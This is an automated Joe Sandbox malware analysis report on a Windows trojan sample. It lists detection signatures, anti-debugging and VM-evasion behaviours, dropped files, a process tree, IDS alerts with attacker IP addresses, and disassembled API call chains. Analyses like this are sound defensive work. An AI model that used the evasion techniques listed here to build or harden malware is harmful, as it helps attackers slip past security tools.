Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VZ7xFmeuPX.exe

Overview

General Information

Sample name:VZ7xFmeuPX.exe
renamed because original name is a hash value
Original sample name:327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac.exe
Analysis ID:1550312
MD5:c7b9fad6691e715033dacd193d65f5bf
SHA1:521b8c1116408f448dec1f407e58a48a8564779a
SHA256:327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac
Tags:exeuser-adrian__luca
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • VZ7xFmeuPX.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\VZ7xFmeuPX.exe" MD5: C7B9FAD6691E715033DACD193D65F5BF)
    • 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe (PID: 7512 cmdline: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe MD5: C62F27864C7A540CAFBD0BDA87D99468)
      • WMIC.exe (PID: 7956 cmdline: wmic BaseBoard get SerialNumber MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MiniThunderPlatform.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP MD5: D863E48A39F83476825B3B4F2379FCF1)
      • MiniThunderPlatform.exe (PID: 5956 cmdline: "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP MD5: D863E48A39F83476825B3B4F2379FCF1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-06T16:40:16.065171+010020229301A Network Trojan was detected20.12.23.50443192.168.2.1049763TCP
2024-11-06T16:40:56.326888+010020229301A Network Trojan was detected20.12.23.50443192.168.2.1057357TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-06T16:40:17.575368+010020516391A Network Trojan was detected120.27.243.15332520192.168.2.1049776TCP
2024-11-06T16:41:27.858250+010020516391A Network Trojan was detected120.27.243.15332520192.168.2.1057358TCP
2024-11-06T16:42:37.974668+010020516391A Network Trojan was detected120.27.243.15332520192.168.2.1057359TCP
2024-11-06T16:43:48.228709+010020516391A Network Trojan was detected120.27.243.15332520192.168.2.1057360TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-06T16:40:27.941781+010028518251A Network Trojan was detected192.168.2.1057267140.206.225.13680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: VZ7xFmeuPX.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAvira: detection malicious, Label: TR/Kryptik.ianbq
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeReversingLabs: Detection: 24%
Source: C:\Users\user\Desktop\AntiCheat.dllReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: VZ7xFmeuPX.exeReversingLabs: Detection: 79%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\AntiCheat.dllJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: VZ7xFmeuPX.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C652E50 IACEncrypt,7_3_6C652E50
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00436C90 CryptQueryObject,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,LocalAlloc,CertGetNameStringW,??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,LocalFree,CertFreeCRLContext,LocalFree,CertCloseStore,CryptMsgClose,14_2_00436C90
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004185E0 CryptMsgClose,14_2_004185E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00418644 CryptMsgGetParam,14_2_00418644
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_0041830B CryptQueryObject,14_2_0041830B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00436C90 CryptQueryObject,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,LocalAlloc,CertGetNameStringW,??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,LocalFree,CertFreeCRLContext,LocalFree,CertCloseStore,CryptMsgClose,15_2_00436C90
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_004185E0 CryptMsgClose,15_2_004185E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00418644 CryptMsgGetParam,15_2_00418644
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_0041830B CryptQueryObject,15_2_0041830B
Source: VZ7xFmeuPX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57286 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57312 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57337 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57338 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57330 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57336 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57331 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57334 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57333 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57332 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57335 version: TLS 1.0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFile opened: C:\Users\user\AppData\Local\Temp\download\MSVCR71.dllJump to behavior
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57356 version: TLS 1.2
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X32.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr
Source: Binary string: atl71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\xlbugreport\bin\ReleseDll.vc7\XLBugHandler.pdb source: XLBugHandler.dll.7.dr
Source: Binary string: msvcp71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1726562366.000000007C3C1000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdb source: concrt140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.7.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb& source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: ^msvcr71.pdb\ source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcr71.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: atl71.pdbT source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdb source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdbGCTL source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: msvcr71.pdb0 source: MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr
Source: Binary string: e:\code_svn\xl_framework\xl_component\minizip\Release\minizip.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.dr
Source: Binary string: cp71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcp71.dll.7.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdbGCTL source: concrt140.dll.7.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: msvcr71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,14_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417E47 FindFirstFileW,14_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_0043DCBA FindFirstFileW,FindClose,14_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,14_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10027330 FindFirstFileA,FindClose,14_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_10071280
